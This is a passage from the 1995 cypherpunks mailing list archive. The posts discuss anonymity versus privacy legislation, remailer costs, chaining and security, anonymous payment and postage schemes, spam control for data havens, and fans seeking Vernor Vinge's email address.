aware that this is in fact the "mainstream" solution to the problem. 
There was some discussion on comp.org.eff.talk of some kind of committee headed by EFF board member Esther Dyson which issued a statement on privacy protection in the nets. They issued the by-now traditional call for laws along the lines of "information collected for one purpose cannot be used for another purpose". Like, VISA can't sell data on your spending patterns, at least not without telling you. Nobody criticized this point; even the relatively net-aware civil liberties types mostly explicitly endorsed this provision. Laws like this are apparently already in place in Europe. So the momentum is in exactly this direction. I think your arguments are good ones; the government would undoubtedly exempt itself from such rules (the IRS is already starting to use dataveillance and matching to look for discrepancies between tax returns and spending patterns), plus such provisions would seem to require a labyrinth of exceptions, special cases, etc. Eventually I could see laws telling exactly what a business can and cannot do with the names of people who phone or net in for information; yes, they can be kept on a list for up to 6 months and sent additional promotional literature, except that the business must require standard form 11832 to allow the customer to get his name off the list, which must be handled within 5 working days for businesses with more than 100 employees, etc., etc. You could have volumes of this kind of stuff. I think Tim wrote some essays a long time back pointing out the absurdity of this approach, especially if you tried to apply it to private individuals. > Bottom line: Anonymity is the only available tool which puts control > over my own privacy firmly into my own hands, where it belongs, and > does so without infringing on anyone's freedom of speech.
Certainly > there are drawbacks, and anonymity may invite some abuses; but we have > survived anonymity's problems in the past, and 'tis better to suffer > in the hell we know than to be dragged into a new and hotter one. The > only society without any crime is a society without any freedom. > > My ($.02) conclusion: For preserving meaningful privacy, and for > preventing an ugly and probably irreversible transformation of our > world, anonymity is the best, perhaps the only viable tool we have. That's a good summary. This is definitely an uphill battle, though. I see no significant standards body or organization of influence (except for CPs, to the extent that we have any influence) which is moving in this direction. Add to this the costs of anonymity as Wei has been discussing and it really isn't clear how to proceed. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLxAj1xnMLJtOy9MBAQGujQIAqooWk8OsbJzbAGpxIP+EYnPJM0kA7Ojm /3i04Odoq/YZEH1Fv81/RbwsDahe+AGtmqU+VQ1KpjUTJuPfNKJ4dQ== =w/FH -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Sun Jan 8 11:29:40 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sun, 8 Jan 95 11:29:40 PST Subject: Anonymity and cost In-Reply-To: <199501080018.QAA11241@netcom4.netcom.com> Message-ID: <199501081921.AA00714@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: > > At a very basic level, anonymous (not pseudonymous, like the remailers > > are) messages are *cheaper*, because they carry less information; they > > do not need to send the bits which identify the sender. > I think the meaning of "anonymous" here is clearly with respect to > _traffic analysis_. The "cost of anonymity" is with respect to the > costs and delays of using digital mixes (remailers)). I don't think it's useful to redefine "anonymous" to include some messages which identify the author, and to exclude some messages which do not identify the author.
Then again, I'm not sure it's useful to play Language Cop, either. But count mine as a voice in favor of describing accurately what's being discussed. (Perhaps messages which defy traffic analysis might be called "untraceable" but not "anonymous", unless they also do not identify an author.) > > Anonymous video conferencing is available now; go to Kinko's, pay > > cash for the use of their video conference room. Or, ask/convince > > the recipient to consider the conversation "off the record". > Neither of these kinds of "anonymity" are cryptographically > interesting, or strong. I agree. I fear I've been influenced by some of the authors on that Cypher[something] list who've recently argued persuasively in favor of applying technology appropriate to local conditions; e.g., not wasting time on the techno-gadget-of-the-month when more pedestrian but functional means are available. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxA7I33YhjZY3fMNAQGIQAQAqzEU6ru3/9/ScfHCZ6DnVK8bDewPVrg2 LAAZpVWuxfAW0W1oJ7NSXxrMmrIEX7MJetrpzlb+D5A1JuOVdtJ8gUwMxCRIMOeI LU78Q/MuSp1oWbPEARDJ6JLZztU3Zs0bQH13kTY1tSZaZlQWj/cmWKUrmis4ZRkE +px7kuMB8lg= =Ty1L -----END PGP SIGNATURE----- From cactus at hks.net Sun Jan 8 11:54:15 1995 From: cactus at hks.net (L. Todd Masco) Date: Sun, 8 Jan 95 11:54:15 PST Subject: Too Much! Message-ID: <199501081959.OAA21945@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Paul J. Ste. Marie writes: > At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote: > >You might want to try reading it from NNTP, via c2.org or hks.net. You > >can then use Kill files. > > At that point, isn't the mailing list simply becoming a newsgroup? For that > matter, is there some reason that escapes me why it ISN'T a newsgroup? I > suppose the proportion of net.kooks is higher in a newsgroup than a mailing > list, but arguably we're ALL net.kooks here. Not really, not until a huge number of hosts carry it as a newsgroup. As for why cypherpunks isn't a newsgroup...
IMO, it would end up carrying too much traffic and be way too high profile. As is, the people who really want to find it will and hordes of riff-raff (not all, mind you) are less likely to bother with it. -- Todd - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxBD/yoZzwIn1bdtAQHMrAF8ChmS332TabEbGslXsxzOLqIHEBOnJBYs KIdzflR9PJWsYuNJBH6LrHtBWK/q7ejP =T4k6 -----END PGP SIGNATURE----- From storm at marlin.ssnet.com Sun Jan 8 13:24:19 1995 From: storm at marlin.ssnet.com (Don Melvin) Date: Sun, 8 Jan 95 13:24:19 PST Subject: Remailer Abuse In-Reply-To: <199501070554.VAA14679@netcom9.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I'm joining this a bit late, but if you take the concept proposed earlier about sticking a remailer stamp on each encrypted envelope and that stamp being removed by the remailer, each remailer will get paid for handling the message. The anonymity (assuming an FV-type postage sale) can be restored by having one or more trusted postage exchanges. You buy a hundred stamps, send them to the exchange, and get back ninety-nine stamps from a pool. You now have a valid remailer stamp that does not have a link to you. Of course, to keep the purchasers honest, the stamps should probably be sent from the purchase point (FV in this example). And there would also have to be a fast clearing house so stamps can't be reused/copied. - -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From jrt at asiaonline.net Sun Jan 8 13:46:50 1995
From: jrt at asiaonline.net (jRT)
Date: Sun, 8 Jan 95 13:46:50 PST
Subject: A Fire Upon the Deep
In-Reply-To:
Message-ID:

When we say 'anonymous video-conferencing' here, I take it that's not the same as in videophones whereby you sit there and have your mugshot transmitted across to the other party... that would be distinctly un-anonymous :)

The thing being, say you set up an anonymous-video-or-otherwise-remailer, you have to ensure that people don't manage to get into that as such would obviously give away the identities of all parties. Given that people can supposedly hack the DOD computer system, that doesn't seem so unlikely, so are anonymous-remailers really all that safe?

------------------------------------------------------------------------------
jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG.
Computers Communications Reduced Rate IDD Service Innovative Widgets
Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

On Sat, 7 Jan 1995, Wei Dai wrote:
> On Sat, 7 Jan 1995, Adam Shostack wrote:
> > Anonymous mail has bandwidth costs that are only slightly
> > higher than regular mail. You could hide quite a bit in most video
> > packets. The latency is a reflection of the lack of volume, because
> > volume is needed for reordering. If your favorite remailer gets more
> > mail, the latency will drop.
>
> Anonymous e-mail that goes through a chain of N remailers will cost at
> least N times as much bandwidth and have N times as much latency as normal
> e-mail.
> But e-mail is hardly the state-of-the-art of network
> communication, while anonymous e-mail IS the state of the art for
> anonymous communication. How long will it take for the technology of
> anonymous video conferencing to develop, for example? By then, of
> course, those who are not concerned with anonymity will probably have
> things such as full sensory virtual interaction.
>
> Note that I SUPPORT anonymous communication, but its costs of bandwidth
> and latency may be a real obstacle to developing Cryptoanarchy (of the
> kind described by Tim May) if most people are not willing to put up with
> those costs.
>
> Wei Dai
> PGP encrypted mail welcome.
>
>

From jrt at asiaonline.net Sun Jan 8 13:48:45 1995
From: jrt at asiaonline.net (jRT)
Date: Sun, 8 Jan 95 13:48:45 PST
Subject: ANONYMOUS REMAILERS
In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com>
Message-ID:

Oops, what I meant to add onto that last bit was that if you're required to keep records of the to and from, and especially the contents, you are severely likely to be raided by some govt agency whenever they wanna see who said what. I'd think twice about using a remailer that kept records on it all.

------------------------------------------------------------------------------
jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG.
Computers Communications Reduced Rate IDD Service Innovative Widgets
Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

From wcs at anchor.ho.att.com Sun Jan 8 18:18:53 1995
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 18:18:53 PST
Subject: The Value of Anonymity
Message-ID: <9501090217.AA13075@anchor.ho.att.com>

Hear, hear! mkj's article on anonymity is worth reading.
From my perspective, the most important thing cryptography offers us is not just the ability to have private conversations without eavesdroppers; it's the ability to change the balance of power from the centralized control and accumulation of information that computers bring back to a level where _you_ can control what happens to your personal data. Do you _like_ starting transactions by giving some big company your Social Security Number which lets them, and everyone else, know everything you've ever done, where you live, how you vote, what you buy?

We can move to a society where you can give the other party as much information as they need to do business with you, without having to give them everything else, or connect this transaction to all your others. Sometimes that means giving people more detail than you give them now, usually less. Cryptography becomes the technical glue to control how much you tell somebody on each transaction, anywhere from total anonymity to deep personal information, to let you have a driver's license that says "yes this person is a safe driver" without it becoming the key to your bank account if you lose your wallet, to have voter's registration that doesn't permit fraud but doesn't require universal identification.

Some good technical references are the set of papers that David Chaum published about blind signatures and anonymous credentials.

Bill

From skaplin at mirage.skypoint.com Sun Jan 8 18:41:03 1995
From: skaplin at mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 8 Jan 95 18:41:03 PST
Subject: Anonymous payment scheme
In-Reply-To: <199501021344.FAA11566@largo.remailer.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199501021344.FAA11566 at largo.remailer.net>, you wrote:
> From: skaplin at skypoint.com (Samuel Kaplin)
>
> I was looking at the bigger picture. Any merchant who accepts Visa or MC
> could now accept anonymous payments. No hassle at all on their part.
> [...]
> The key
> would be not to have the card attached to the account. If the card is
> attached to any type of account, then there are reporting requirements.
>
> Visa was talking about an electronic traveller's check, which, from
> what I could tell, instantiated an account in the sum of the value of
> the card purchased, which was then drawn down by purchase. The card,
> evidently, had no embossing on it. Personalization was limited to
> some account id which would last the lifetime of the balance and then
> disappear.

This is EXACTLY what I was contemplating. I really wish they would implement it. Then I can get the traveler's cheques out of my wallet. (unsigned in both spots, of course.)

- --
==============================================================================
skaplin at skypoint.com                   | Finger skaplin at infinity.c2.org for
                                         | a listing of crypto related files
PGP encrypted mail is accepted and       | available on my auto-responder.
preferred.                               | (Yes...the faqs are there!)
                                         |
E-mail key at four11.com for PGP Key or  | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com    | outside a Roman brothel.
==============================================================================
Be careful when playing under the anvil tree.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From speed at cs.washington.edu Sun Jan 8 19:17:30 1995
From: speed at cs.washington.edu (Erik Selberg)
Date: Sun, 8 Jan 95 19:17:30 PST
Subject: From me to me to you...The Actual Article
Message-ID: <199501090318.TAA14113@meitner.cs.washington.edu>

Carol Anne Braddock writes:
> This is the article, and what I did with it. It is complete in its
> entirety, from the bang paths, to the crosspostings. Please study them
> Now, the article,
> Date: Sat, 7 Jan 1995 01:26:26 -0600
> From: Carol Anne Braddock
> To: carolann at vortex.mm.com
> Newsgroups: soc.support.transgendered, alt.transgendered,
> mn.general, alt.sex.femdom, alt.artcom, alt.sex.bondage, alt.sex,
> comp.infosystems.www.users, alt.dreams.lucid, alt.dreams
> Subject: (fwd) Re: Phil Zimmermann

So, I don't read any of those groups, and I could be dead wrong on all of this. But I'll yap away anyway.

Off the cuff, I'd say your article could be inappropriate. Granted it's a good cause, and you're not advertising for yourself but for a charity. However, charitable spam is still spam (and I'm not calling your article spam... spam lite, maybe). I understand your point about feeling a sense of community with the above groups; however, I think that massive "Please help..." postings can be just as annoying as the MAKE.MONEY.FAST postings.

Erik Selberg "I get by with a little help
selberg at cs.washington.edu from my friends."
http://www.cs.washington.edu/homes/selberg

From weidai at eskimo.com Sun Jan 8 19:27:03 1995
From: weidai at eskimo.com (Wei Dai)
Date: Sun, 8 Jan 95 19:27:03 PST
Subject: Remailer security
In-Reply-To:
Message-ID:

On Mon, 9 Jan 1995, jRT wrote:
>
> The thing being, say you set up an anonymous-video-or-otherwise-remailer,
> you have to ensure that people don't manage to get into that as such
> would obviously give away the identities of all parties. Given that
> people can supposedly hack the DOD computer system, that doesn't seem so
> unlikely, so are anonymous-remailers really all that safe?

This is why you want to use a remailer chain instead of just one remailer. Hopefully, not all of the remailers in your chain are subverted by your enemy. (They may all be subverted, but as long as not by people who cooperate with your enemy you're still ok :-)

Also, make your chains as heterogeneous as possible. That is, include remailers that use different hardware, operating systems, remailer softwares, are in different countries, are controlled by different organizations, etc., so that one security hole will not compromise your entire chain.

I've kinda evaded the original question, which is about the (average?) security of the individual remailers. Does anyone have a real answer?

Wei Dai

PGP encrypted mail welcome. (I realize a PGP signature says this implicitly, but I left my key in another computer.)

From entropy at IntNet.net Sun Jan 8 19:53:13 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Sun, 8 Jan 95 19:53:13 PST
Subject: Vinge's _A Fire Upon the Deep_
In-Reply-To:
Message-ID:

> I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you
> and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze
> mail me. First book of his I've read, first of its kind I've enjoyed in a
> very long time. I'll scan my favorite crypto-related (legal-length) excerpt
> and post it next week, howzat?

Ditto that. I've enjoyed all of his works.
He's one of my top three favourite SF writers of all time.

Any of you who are in contact with VV have an e-mail address for him? He deserves accolades, but snailmail is too slow for my liking.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From wcs at anchor.ho.att.com Sun Jan 8 19:54:12 1995
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 19:54:12 PST
Subject: Latency, bandwidth, and anonymity
Message-ID: <9501090353.AA13655@anchor.ho.att.com>

My initial reaction to "Anonymous video conferencing" was "That's when you wear black ski masks and use voice scramblers and call from video payphones", i.e. not very useful. ("Subcomandata Marcos here...")

On the other hand, Wei Dai's followup message about
> In the longer term, anonymous communication is in danger of being used
> only by fringe groups if it falls too much behind the non-anonymous kind
> in terms of latency and bandwidth (and cost, I guess). Maybe ONLY drug
> dealers, nuclear terrorists, etc., will use anonymous remailers when full
> sensory virtual interaction is the most popular way for most people to
> communicate and remailers are still the only choice for the
> anonymity-conscious.
puts a different spin on it. It's a real problem, if not now, then maybe in 5-10 years. I realize that those of us in the Phone Company who have predicted universal Picturephone in the past have been over-optimistic :-), but the video compression people and the faster-chip people keep bringing us closer to having good-quality low-bandwidth video, and ISDN and fast modems are bringing available loop-end bandwidth up to the point that reasonably-priced circuits can carry it.
(Long-haul raw bits have been cheap enough for a while; it's the distribution and switching technology that have a lot of the cost, and providing cheap high-bandwidth circuits makes it hard to make money on voice calls.)

The approaches to anonymous video conferencing will depend a bit on whether the technology takes off on the nets or the phone system, if those two are still different by then. It's easier to obscure the origins of a call on the nets, where users own large parts, than it is on the phone system, where the Phone Companies own and operate most of it; the latter environment would require Phone Remailers, such as PBXs you call into on T1 lines and get shuffled out on other circuits - it's hard to get adequate mixing except in rather large environments.... Recircuiting on the nets will be left as an exercise to the reader.

I suspect the harder parts of the job may be doing the faces and voices right - anonymous voice conference bridges are ok if the participants mostly don't know each other, but they're less useful if people know each other and cops with computerized voiceprint equipment may be eavesdropping (not common now, though computers and models of the human voice are improving; I suppose voice disguisers may improve from the kid's-toy quality to something better if there's a market, or if computers with full-duplex soundcards become more common.)

Faces are harder, and they're not really a crypto problem - how do you fake them well? It's not too hard to do a "quayletool" quality solution that generates moving lips in front of a static picture, even timed with an audio feed, but that won't play too well in the business world, and having the camera pointing at your calendar or home page is only semi-useful. If video-calling evolves on the nets, there'll be a lot more need for speed-matching services, and it may be that computer-enhanced video receiving for high-bandwidth users will fund the technology development for face-simulation?
If so, maybe you can use it to start with fake stills instead of real ones?

Bill

From wcs at anchor.ho.att.com Sun Jan 8 20:49:40 1995
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 20:49:40 PST
Subject: Data Haven problems
Message-ID: <9501090448.AA14477@anchor.ho.att.com>

dfloyd asks for ideas about preventing spamming in data havens, for the code that he's working on. It's a hard job. A related problem is how to prevent your data haven from becoming the porno-ftp site of the week, and either being swamped with traffic or raided by the Post Office Reactionary Neighborhood Police.

One way to stop spamming is to charge sufficient money for the service that using it always pays for itself - spamming is then reduced to a source of profit, e.g. no problem. If people want to hire you to store spam, it's their money they're wasting. But that requires an anonymous digital cash infrastructure, which we don't really have yet. And it's a lot less interesting academically (:-) than finding solutions which can also work in a cooperative system, or at least a system that doesn't charge per transaction.

Probably the most important step you can take is to build in operator-selectable filtering, because the problems keep changing. Operators probably need to be able to block storage and retrieval by specific users and sites (It's easier to prevent access by president at whitehouse.gov than it is to detect forged requests, and you probably want to keep both real and fake Cantor&Siegel users off, plus the bozo of the month and the broken-remailer of the day.) Some operators may find it useful to limit the amount of data that can be stored or retrieved by a specific user or site, though this is less useful with anonymous and pseudonymous remailers around, since "a specific user" becomes vaguer.
Filtering by filename and type can also be useful - if you don't allow files named *.gif and *.jpg, users may be less likely to spam you with pornography. Namespace control in general is an issue - do users get to choose filenames, or list directories, or do they have to know the names of files to retrieve. Another issue is whether files can only be retrieved by the sender - probably a local policy issue.

Some sites may only accept encrypted files, which reduces the spam potential considerably, as well as reducing your exposure to the porn police, though it's difficult to do anything about files that are encrypted with a public key whose private key has been posted to the net, or fake crypto headers in an otherwise unencrypted file, unless you put in lots more code to check the insides of files and watch the net for such postings, which is unrealistic. There's also the problem that PGP and especially RIPEM files are non-stealthy, and users may not want to leave even keyids in their files.

Bill

From wcs at anchor.ho.att.com Sun Jan 8 21:09:23 1995
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 21:09:23 PST
Subject: Can someone verify this conjecture for me?
Message-ID: <9501090508.AA14605@anchor.ho.att.com>

> From: nelson at crynwr.com (Russell Nelson)
> > It seems like it solves two separate problems: 1) foiling traffic
> > analysis, and 2) foiling a cheater remailer. The problems are
> > separate, really, because if you really, really trust the remailer (as
> > many people do Julf), then 2) isn't a problem. All you need to do is
> > solve 1. Or, you can solve 1) by using a single remailer. A
> > necessary but not sufficient step to foil traffic analysis is to strip
> > headers.

There are a couple of advantages of chaining multiple remailers. One is that traffic analysis is an art, rather than a science, and to really foil it, you've got to know how good it is, which is hard.
Long-term patterns may show up even though the traffic mixes are pretty good in the short run, and if you can spread out the remailer use and increase the traffic load, plus constantly sending encrypted traffic between remailers, it does make the job harder. If the Bad Guys can isolate their target to a few remailer users, they can often find the real one by rubber-hose or a small number of wiretaps at the user locations instead of the remailers; that's impractical if there are thousands of potential users in multiple countries across the remailer-chain.

Another is that if one good trustable remailer can foil traffic analysis, then multiple remailers increases the chance that at least one of them is good. Sure, Julf's a good guy, but what if the KGB has kidnapped his grandmother, or the CIA has planted wiretaps inside his computer - will you know if it's compromised? There's also the reliability issue - what if the Finnish Phone Company decides Julf is using too much of their resources and cuts him off, or the Mafia steals one of your police-informants' remailers, or the California Public Utilities Commission declares email to be a common carrier and insists on auditing all transactions? Multiple remailers in a strongest-link chain reduce the risks.

Bill

From lwp at garnet.msen.com Sun Jan 8 21:16:53 1995
From: lwp at garnet.msen.com (Lou Poppler)
Date: Sun, 8 Jan 95 21:16:53 PST
Subject: Vinge's True Email name ?
In-Reply-To:
Message-ID:

I knew that old compuserve account was good for something.
They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com

From cactus at seabsd.hks.net Sun Jan 8 23:23:39 1995
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Sun, 8 Jan 95 23:23:39 PST
Subject: Vinge's True Email name ?
Message-ID: <199501090729.CAA28854@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article , Lou Poppler wrote:
>I knew that old compuserve account was good for something.
>They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com

Sigh. Please don't use this, people. I'm sure VV has no desire to pay for oodles of mail telling him just how much people like him. Treat it like a home phone number (of course, some people abuse home phone numbers of famous folks...).

- - --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Sun Jan 8 23:54:29 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 8 Jan 95 23:54:29 PST
Subject: Vinge's True Email name ?
Message-ID: <199501090800.DAA29142@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

NOTE: This mutation of this thread has no crypto content, but some (awfully specific) privacy relevance.

Todd Masco writes:
> Lou Poppler wrote:
> >I knew that old compuserve account was good for something.
> >They list Vinge, Vernor San Diego CA [email address omitted]
> Sigh. Please don't use this, people. I'm sure VV has no desire to
> pay for oodles of mail telling him just how much people like him. Treat
> it like a home phone number (of course, some people abuse home phone
> numbers of famous folks...).
I began composing a reply precisely to this effect, but was stopped by the words "They list...". If the address appears in some standard Compu$erve email directory, then this was hardly a major transgression.

Allow me to suggest a compromise. If some enterprising VV fan would volunteer to collect fan mail from c'punks, then forward it all, everyone involved might be fairly satisfied.

Disclaimer: I'm not familiar with the details of CI$'s fee schedule; if one pays by sheer volume and not number of messages, then obviously this approach won't alleviate the burden. Maybe then someone could volunteer actually to ask VV whether/how he'd like to hear from fans....

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From weidai at eskimo.com Mon Jan 9 00:04:06 1995
From: weidai at eskimo.com (Wei Dai)
Date: Mon, 9 Jan 95 00:04:06 PST
Subject: Vinge's True Email name ?
In-Reply-To: <199501090729.CAA28854@bb.hks.net>
Message-ID:

On Mon, 9 Jan 1995, L. Todd Masco wrote:
> Sigh. Please don't use this, people. I'm sure VV has no desire to
> pay for oodles of mail telling him just how much people like him. Treat
> it like a home phone number (of course, some people abuse home phone
> numbers of famous folks...).
A general hint for finding authors' e-mail addresses: figure out where he/she works from the book jacket, use WHOIS to find their domain name, and then finger them or look at their web page to see if they have an e-mail directory. (Now keep this a secret! I don't want the internet.masses to find out my e-mail address when I become rich and famous! :-)

I bet Vinge has written for himself a really intelligent filter like the kind he describes in AFUtD. Of course I wouldn't want to test this.

I guess this is not really related to cypherpunks, except to the general philosophy of making tools to protect oneself, instead of relying on the good will (and intelligence) of others.

Wei Dai

From cactus at hks.net Mon Jan 9 00:31:37 1995
From: cactus at hks.net (L. Todd Masco)
Date: Mon, 9 Jan 95 00:31:37 PST
Subject: More signal than YOU can handle.
Message-ID: <199501090837.DAA29692@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

For the moment, all of the archives that Eric just dropped me are on

ftp://ftp.hks.net/cypherpunks/All

I'll be making some primitive engines to access individual articles by various means but I thought I'd put 'em up in case anybody else with more disk space than brains would like to snarf 'em (following the Shulgin model).

(By the way, Glimpse looks like it'll be ideal, since everything is already in its own file, the "since June" archive currently being our /usr/spool/news/... dir.)

Look for more info in this space (that sucking sound is my copious free time).

- - -- Todd.

- -----BEGIN PGP SIGNATURE-----
Version: 2.7
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From tcmay at netcom.com Mon Jan 9 00:46:58 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 00:46:58 PST
Subject: Vinge's True Email name ?
In-Reply-To: <199501090800.DAA29142@bb.hks.net>
Message-ID: <199501090847.AAA23833@netcom2.netcom.com>

L. McCarthy wrote:
> I began composing a reply precisely to this effect, but was stopped by the
> words "They list...". If the address appears in some standard Compu$erve
> email directory, then this was hardly a major transgression.
>
> Allow me to suggest a compromise. If some enterprising VV fan would volunteer
> to collect fan mail from c'punks, then forward it all, everyone involved
> might be fairly satisfied.

As I described in a post last summer, I was at a party that Vernor was at, and several of us stayed over until Sunday afternoon (it being deep in the mountains of Marin and all, a long drive). Eric Hughes was there. Anyway, I talked about all this in that post. Vernor was there until Sunday night, too, when the party hosts drove him off to SFO (the airport, for the TLA-impaired) and I dropped Eric off in Berkeley on my way home to Santa Cruz.

The point I'm making?

First, Vernor had gotten some Cypherpunks posts forwarded to him by that time, mostly by Russell Whittaker. He is well-aware that the Cypherpunks list exists, and one must presume that if he wanted to be on the list, he could be on it easily. (I doubt his CompuSlave account is his only one, as he's on the faculty at San Diego State, and hence has the usual access. I suspect he uses the CompuServe account for his rec.arts.sf-lovers sort of mail; just a hunch.)
Second, he was aware of--and generally pleased by--the explicit role "True Names" played in the early motivation for our activities. (As is well known, the works of Chaum, Vinge, Card, Stephenson, Brunner, and others played major roles.)

Third, for the curious, he _is_ working on a sequel to "AFUTD."

Contact him if you wish, but bear in mind that the more time he has to spend reading and answering e-mail, the less work he'll get done on his SF writing. (And if he has to spend many hours getting his HyperMIME-JPEG3 SLIP system running to see "Vernor Rulez!" in 80-point type, he may truly decide he's been marooned in realtime.)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From weidai at eskimo.com Mon Jan 9 00:56:36 1995
From: weidai at eskimo.com (Wei Dai)
Date: Mon, 9 Jan 95 00:56:36 PST
Subject: Latency, bandwidth, and anonymity
In-Reply-To: <9501090353.AA13655@anchor.ho.att.com>
Message-ID:

On Sun, 8 Jan 1995 wcs at anchor.ho.att.com wrote:
> My initial reaction to "Anonymous video conferencing" was
> "That's when you wear black ski masks and use voice scramblers
> and call from video payphones", i.e. not very useful.
> ("Subcomandata Marcos here...")

Video conferencing was just ONE of the applications of high-bandwidth, low-latency anonymous communication. Maybe it was a bad example. Here's a couple more:

1.
anonymous distributed computing: suppose Alice wants to help Bob crack a secret key by using both of their computers, but the algorithm entails some heavy exchange of data between them

2. anonymous remote consulting: Alice is building a nuclear bomb and needs help, so she sends a live video feed of her workshop to Bob (and have the computer blot out her face in real time). Bob sends Alice an audio only commentary of what Alice is doing wrong.

We tend to focus on the more exotic applications of these tools, but as mjk pointed out they will have perfectly ordinary uses by people who simply don't want everyone in the world to be able to know everything about them. Maybe Alice just wants to call AT&T to ask about their Clipper phone, and not have everybody realize that and send her a bunch of propaganda about Voice PGP. :-)

Even now, this may not be as implausible as it sounds. What if Alice is using MCI as the long distance carrier, and MCI happens to be selling Voice PGP?

Wei Dai

From lmccarth at ducie.cs.umass.edu Mon Jan 9 01:27:51 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 9 Jan 95 01:27:51 PST
Subject: PV Advocate on Clipper in `95
Message-ID: <199501090933.EAA03532@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Just ran across a pretty nice (IMHO) short piece of media coverage of Clipper in a local weekly, the [Pioneer] Valley Advocate. This is item #85 in the "Tech Check" section of their list of "95 Things to Watch for in 1995". Joint authors of the whole forecast are: Mark Kendall Anderson, Everett Hafner, Stephanie Kraft, Tom Mudd, Steve Penhollow, Chris Rohmann, David Simons, Michael Strohl, and Rob Weir.

------------------ begin included text ----------------------

85. Clipper Clipping Along

Unfortunately, the failure of the mainstream media to cover the government's steamroller tactics in technology policy may well continue.
